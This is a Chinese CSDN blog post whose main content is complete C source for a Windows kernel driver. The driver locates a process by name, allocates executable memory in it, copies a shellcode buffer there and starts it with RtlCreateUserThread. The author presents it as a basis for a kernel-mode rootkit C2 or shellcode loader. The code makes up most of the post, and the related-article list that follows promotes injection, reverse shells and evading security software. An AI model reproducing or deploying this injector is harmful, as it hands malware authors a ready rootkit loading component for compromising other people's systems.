驱动ShellCode注入

最新推荐文章于 2024-05-15 09:50:50 发布
最新推荐文章于 2024-05-15 09:50:50 发布
阅读量564 收藏 11
点赞数 7
分类专栏: 操作系统 二进制 win内核 文章标签: 驱动开发 安全 web安全 系统安全 安全架构
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_18811919/article/details/131094033
版权
win内核 同时被 3 个专栏收录
21 篇文章 2 订阅
订阅专栏
操作系统
19 篇文章 3 订阅
订阅专栏
二进制
16 篇文章 0 订阅
订阅专栏

文章目录

驱动ShellCode注入提权简述
常见的ShellCode加载器都是在R3层进行的如果有同学想在R0实现Rootkit C2并实现ShellCode注入或者是,
ShellCode加载器那么可以参考如下代码,该代码主要使用KeStackAttachProcess附件目标进程切换堆栈实现,
ShellCode加载效果。

#include <ntifs.h>
#include <ntddk.h>
//ShellCode
UCHAR assemblyCode[10000]={0x90,0x90,0x90,……}
// 根据进程ID返回进程EPROCESS结构体,失败返回NULL
PEPROCESS GetProcessNameByProcessId(HANDLE pid)
{
    PEPROCESS ProcessObj = NULL;
    NTSTATUS Status = STATUS_UNSUCCESSFUL;
    Status = PsLookupProcessByProcessId(pid, &ProcessObj);
    if (NT_SUCCESS(Status))
        return ProcessObj;
    return NULL;
}
NTSTATUS GetProcessHandleByProcessId(HANDLE pid, PHANDLE processHandle) {
    OBJECT_ATTRIBUTES objAttr;
    CLIENT_ID cid;
    NTSTATUS status;
    InitializeObjectAttributes(&objAttr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
    cid.UniqueProcess = pid;
    cid.UniqueThread = NULL;
    status = ZwOpenProcess(processHandle, PROCESS_ALL_ACCESS, &objAttr, &cid);
    return status;
}

//提供一个Unload函数只是为了让这个程序能动态卸载
VOID DriverUnload(PDRIVER_OBJECT driver) {
    DbgPrint("first:Our driver is unloading...\r\n");
}
NTKERNELAPI UCHAR* PsGetProcessImageFileName(IN PEPROCESS Process);
// 根据ProcessName获取到进程的PID号
HANDLE GetPidByProcessName(char* ProcessName)
{
    PEPROCESS pCurrentEprocess = NULL;
    HANDLE pid = 0;
    for (int i = 0; i < 1000000000; i += 4)
    {
        pCurrentEprocess = GetProcessNameByProcessId((HANDLE)i);
        if (pCurrentEprocess != NULL)
        {
            pid = PsGetProcessId(pCurrentEprocess);
            if (strstr(PsGetProcessImageFileName(pCurrentEprocess), ProcessName) != NULL)
            {
                ObDereferenceObject(pCurrentEprocess);
                return pid;
            }
            ObDereferenceObject(pCurrentEprocess);
        }
    }
    return (HANDLE)-1;
}
NTSTATUS RtlCreateUserThread(
    HANDLE               ProcessHandle,
    PSECURITY_DESCRIPTOR SecurityDescriptor,
    BOOLEAN              CreateSuspended,
    ULONG                StackZeroBits,
    PULONG               StackReserved,
    PULONG               StackCommit,
    PVOID                StartAddress,
    PVOID                StartParameter,
    PHANDLE              ThreadHandle,
    PCLIENT_ID           ClientID
);
//申请内存
NTSTATUS readprocess(HANDLE pid)
{
    HANDLE jubing1;//存放进程句柄
    OBJECT_ATTRIBUTES shuxing_duixiang;
    CLIENT_ID iphao;
    NTSTATUS zhuangtai1;
    PVOID dizhi1;//分配好的内存地址
    SIZE_T diqudaxiao;//分配好的内存尺寸
    iphao.UniqueProcess = (HANDLE)pid;
    iphao.UniqueThread = 0;
    diqudaxiao = (sizeof(assemblyCode) + 0xFFFF);
    dizhi1 = 0;//注意要赋值
    memset(&shuxing_duixiang, 0, sizeof(OBJECT_ATTRIBUTES));
    zhuangtai1 = ZwOpenProcess(&jubing1, GENERIC_ALL, &shuxing_duixiang, &iphao);//PROCESS_ALL_ACCESS
    if (!NT_SUCCESS(zhuangtai1))
    {
        KdPrint(("进程打开失败\n"));
    }
    else
    {
        KdPrint(("打开进程成功 pid==%d 进程句柄%x\n", iphao.UniqueProcess, jubing1));
    }

    NTSTATUS res = ZwAllocateVirtualMemory(jubing1, &dizhi1, 0, &diqudaxiao, MEM_COMMIT, PAGE_EXECUTE_READWRITE);//在进程中分配一块可用内存
    if (!NT_SUCCESS(res))
    {
        KdPrint(("内存分配失败\n"));
    }
    else
    {
        KdPrint(("分配好的虚拟内存地址%X	分配内存的大小%d\n", dizhi1, diqudaxiao));
        /* NtWriteVirtualMemory();
         ZwWriteVirtualMemory();*/
        PHYSICAL_ADDRESS physAddress = MmGetPhysicalAddress(dizhi1);
        DbgPrint("Allocated virtual address: %p\n", dizhi1);
        DbgPrint("Physical address: %p\n", physAddress);
        NTSTATUS status = STATUS_SUCCESS;
        PEPROCESS targetProcess = NULL;
        // 根据 PID 获取目标进程对象
        status = PsLookupProcessByProcessId(pid, &targetProcess);
        KAPC_STATE apcState;
        //附加目标进程切换堆栈
        KeStackAttachProcess(targetProcess, &apcState);
        //将shellcode拷贝到目标进程虚拟内存中
        memcpy(dizhi1, assemblyCode, sizeof(assemblyCode));
        HANDLE hThread;
        //创建线程执行ShellCode
        CLIENT_ID clientId;
        NTSTATUS ThreadStatus = RtlCreateUserThread(jubing1, NULL, FALSE, 0, NULL, NULL, dizhi1, NULL, &hThread, &clientId);
        KeUnstackDetachProcess(&apcState);
    }
    ZwClose(jubing1);
    return 0;
}


NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING reg_path) {
    readprocess(GetPidByProcessName("process.exe"));
    return STATUS_SUCCESS;
}
虚构之人
关注
专栏目录
shellcode注入驱动
SHELLCODE_8BIT的博客
02-21 2059
避坑 | Windows驱动签名经验贴 - FreeBuf网络安全行业门户
C++:DLL注入(附完整源码)
希望我的博客,能帮上你解决学习中工作中所遇到的问题
12-27 402
C++:DLL注入(附完整源码)
C/C++ 将ShellCode注入进程内存
CSDN
11-06 5533
内存注入ShellCode的优势就在于被发现的概率极低,甚至可以被忽略,这是因为ShellCode注入到进程内存中时,其并没有与之对应的硬盘文件,从而难以在磁盘中取证,但也存在一个弊端由于内存是易失性存储器,所以系统必须一直开机,不能关闭,该攻击手法可以应用于服务器上面,安全风险最小,注入后将注入器删除即可。
驱动开发:内核ShellCode线程注入
CSDN
06-14 7926
还记得`《驱动开发:内核LoadLibrary实现DLL注入》`中所使用的注入技术吗,我们通过`RtlCreateUserThread`函数调用实现了注入DLL到应用层并执行,本章将继续探索一个简单的问题,如何注入`ShellCode`代码实现反弹Shell,这里需要注意一般情况下`RtlCreateUserThread`需要传入两个最重要的参数,一个是`StartAddress`开始执行的内存块,另一个是`StartParameter`传入内存块的变量列表,而如果将`StartParameter`地址填充
ShellCode注入
南宫封清的博客
05-03 1493
注意点: 1. 不能有全局变量 2. 不能使用常量字符串 ,可以使用这种形式 szTitle = {'a', 'b', 'c', 0}; 3. 不能使用系统调用,比如不能直接使用MessageBox,因为生成的汇编是 Call [0xxxxxx],这个0xxxxx是导入表的地址,注入的程序导入表地址不同而且导入表中不一定有这个函数,可以使用LoadLibrary配合GetProcAddres...
注入shellcode
H888001的博客
11-08 1308
shellcode是能够放在任何地方都能够执行的机器码 2.编写shellcode原则 一:不能有全局变量 二:不能调用系统函数 三:不能嵌套调用函数 3.编写shellcode实战 一:shellcode分为基本模块和功能模块,结构如下图: FS:[0]是TEB 从FS:[0X30]对应peb,偏移找到当前线程的dll模块链表,找到模块基地址, 利用pe导出表知识...
将shllcode注入Linux中正在运行的进程(C/C++代码实现)
chen1415886044的博客
07-30 1063
进程注入是一种在单独的活动进程的地址空间中执行任意代码的方法。在另一个进程的上下文中运行代码可以允许访问该进程的内存、系统/网络资源,以及可能提升的权限。通过进程注入执行也可能逃避安全产品的检测,因为在合法进程下执行是被掩盖的。 有许多不同的方法可以将代码注入进程,其中许多方法滥用合法功能。这些实现适用于每个主要的操作系统,但通常是特定于平台的。 更复杂的样本可以利用命名管道或其他进程间通信(IPC)机制作为通信信道来执行对分段模块的多个进程注入,并进一步逃避检测。
ShellCode —— 无线程注入
墨鱼菜鸡
07-26 184
背景 也叫进程内存替换,就是指将一个进程的内存数据清空,写入任意我们想写入的数据,并更改执行顺序,执行我们写入的数据代码。 简单过程就是: 创建一个挂起主线程的进程(也可以直接挂起目标进程,不自己创建)在新进程的地址...
逆向随笔——对可以过TP的注入驱动的一次逆向
Lixinist的博客
10-21 2425
前言: 逆一些东西,有点收获,就写篇随笔记录一下。因为写的随便,就不发看雪了。 今天一个朋友给我发了一个说是可以过TP的注入驱动,希望我逆一下看看是什么套路。 正文: 接收过来压缩包,看了一下 loadddll32和64分别是用在32和64的驱动,MemOpe和dnf.exe都是测试用例(不过我是用自己写的123.exe进行测试)。 先跑起来,看看线程和模块上有没有什么特别的地方 有一个线程P...
内核线程注入x64
11-22
内核线程注入是一种高级的系统编程技术,主要用于在操作系统内核层面对进程进行操作,例如注入DLL(动态链接库)或执行特定的ShellCode。本文将深入探讨在64位Windows 7环境下,如何利用驱动程序实现内核线程注入。 ...
inject:将 shellcode 注入 x86 上的 ELF3264 二进制文件,并将入口点重定向到新代码
07-03
注入shellcode 注入 x86 上的 ELF32/64 二进制文件,并将入口点重定向到新代码。
远程线程注入工具,可生成代码 可自定义shellcode注入进程-易语言
06-14
程序界面,可自定义任意shellcode 注入任意进程 此程序自带将msf的远控shellcode转换成 易语言 可调用的shellcode 同时还可以将注入的功能生成出自己的程序可调用的代码 双击第三个输入框即可生成shellcode,这里默认的shellcode是远程线程注入 注入的是当前程序选择注入的进程 这里选择最左下角的选项,然后再双击输入框 即可生成在自身程序执行的shellcode 这里说明一下哈,这里是可以自定义shellcode进行注入的,并不是必须使用msf生成的shellcode进行注入 这里将自己扣出来的shellcode放在第一个输入框就行了,十进制的机器码之间以半角符逗号分隔开 生成的shellcode给自己的代码调用 记得要配合上 精易模块 进行使用 当然了 也可以自己手动补dll进去 以下为关键代码的截图 使用易语言好几年了,从最初的进厂打工(满心的无奈) 到现在的安全工程师,易语言是带我入门的语言 也是我至今最喜欢的语言之一 易语言对于我来说更多的是一种说不上来的感觉 对于我来说易语言是有生命的 也是易语言赐予了我入门这行的基础(很扎实很扎实) 此工具是前两天匆忙写出来的,如果有哪里做的不够好以及觉得此程序很烂的大佬们不要喷我 以下为下载地址 此程序使用了精易模块以及未闻花名的 皮肤模块
动态Shellcode注入工具 – Shellter
黄啊码
07-29 1426
Shellter已经被正式收录到Kali Linux中,这是该项目发展至今最重要的一个里程碑。由于目前用于辅助渗透测试人员躲避安全软件的工具比较少,所以这里就请大家容我多少几句。 Shellter是什么 这是一款真正意义上的动态Shellcode注入工具。“动态”二字就能够说明注入代码不可能存在于规则严格的地方,例如可执行文件的入口点等。Shellter目前仅支持32位可执行文件,为这个项目已
Shellcode注入:深入探究Windows安全中的注入技术
EcmShell的博客
09-17 180
总结起来,Shellcode注入是一种常见的Windows安全注入技术,它允许我们向目标进程中注入自定义的代码。请记住,正确使用注入技术是非常重要的,应遵循相关法律法规和道德准则,确保系统和数据的安全性。在Windows安全领域中,注入技术是一种常见且重要的技术手段,用于向目标进程中注入自定义的代码。其中,Shellcode注入是一种常见的注入技术,它允许我们在目标进程的上下文中执行自定义的指令序列。通过这种方式,我们成功地将Shellcode注入到目标进程中,并在目标进程的上下文中执行自定义的指令序列。
编写shellcode注入至进程
挖树
10-18 4789
shellcode 维基百科: 在计算机安全中,shellcode是一小段代码,可以用于软件漏洞利用的载荷。 被称为“shellcode”是因为它通常启动一个命令终端,攻击者可以通过这个终端控制受害的计算机,但是所有执行类似任务的代码片段都可以称作shellcode。 …… Shellcode通常是以机器码形式编写的。 去掉修饰词,shellcode就是一段机器码。 关于shellcode如何...
邪恶的RING0注射SHELLCODE
08-22 1241
ZwCreateProcessEx 是个非常非常好的东西,虽然他是个UNDOC.但是如果你仔细阅读过WIN2K的SRC,并且非常了解PE的运行机制,你会发现一些很有趣的东西。这对目前的所有NT内核的系统来说都是致命的可以用来做什么1. 制造漏洞2. 提升权限3. 拿来写病毒4. 拿来写各种木马5. 各种ROOTKI但是这里我只想很简单的说一下原理。我只希望这样的东西只用来讨论而已,
第17节 实战:shellcode进程注入
最新发布
imbyter师哥的博客
05-15 362
我最近做了一个关于shellcode入门和开发的专题课👩🏻‍💻,主要面向对网络安全技术感兴趣的小伙伴。这是视频版内容对应的文字版材料,内容里面的每一个环境我都亲自测试实操过的记录,有需要的小伙伴可以参考。传统的exe文件执行都是在自己的进程空间中,而shellcode本身没有固定的执行进程,它取决于加载器将它“安排”到哪个进程,它就在哪个进程执行。这种以进程“寄宿”方式执行的方式就被称为进程注入
笔记:ShellCode 远程线程注入
喜欢唱,rap,篮球的程序员
09-19 586
什么是进程,什么是线程进程就是4GB的空间,线程就是EIP。
【2021.01.15】注入ShellCode
oalken的博客
01-15 739
什么是ShellCode? 不依赖环境,在任何地方都能执行的机器码(硬编码)。 ShellCode的编写原则 不能有全局变量。 不能使用常量字符串、 不能使用系统调用。 不能嵌套调用其他函数。 ShellCode的问题 由于第 3 点,所以不能直接使用函数,因为直接使用函数在编译时会产生导入表。而将代码复制到其他进程中,其他进程没有需要的导入表,所以会出问题。 那么该怎么解决这个问题呢? 可以不依赖任何导入表得到进程的TEB,其次,通过TEB找到PEB,再找到 3 个链表。 对链表进行遍
Linux系统安全:利用ptrace进行shellcode注入研究
攻击者可能通过溢出将shellcode(恶意代码)注入到内存中,然后执行`execl`来替换当前进程的执行流,执行攻击者指定的命令。 `insert`函数的作用是将特定字符串写入标准输入,这是为了在特定条件下插入shellcode。`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

虚构之人

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值